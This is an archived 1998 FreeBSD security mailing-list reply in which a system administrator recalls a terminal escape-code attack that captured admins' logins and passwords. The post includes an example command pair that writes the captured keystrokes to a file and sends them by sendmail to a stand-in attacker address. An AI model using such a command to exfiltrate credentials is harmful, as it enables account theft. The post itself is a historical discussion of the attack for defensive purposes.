From owner-freebsd-security Thu Sep 10 14:03:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA25764 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:03:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gate.az.com ([206.63.203.18]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA25724 for ; Thu, 10 Sep 1998 14:03:10 -0700 (PDT) (envelope-from yankee@gate.az.com) Received: (from yankee@localhost) by gate.az.com (8.8.5/8.8.5) id OAA25189; Thu, 10 Sep 1998 14:02:54 -0700 (PDT) Date: Thu, 10 Sep 1998 14:02:54 -0700 (PDT) From: "Dan Seafeldt, AZ.COM System Administrator" To: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <199809101622.MAA09014@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org A similar but different technique was used at a wa university computer center here in the 80's - A 'bomb' or sequences of escape codes imbedded in a routine sounding email message to the root console or staff console which which caused the terminals in the staff/admin offices to record certain keypresses as a macro string (specifically entry of login/password) then at the right time enter/playback something like this while sitting at a prompt: echo '...recorded keypresses...' > tmpfile sendmail hack@hackville.com < tmpfile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message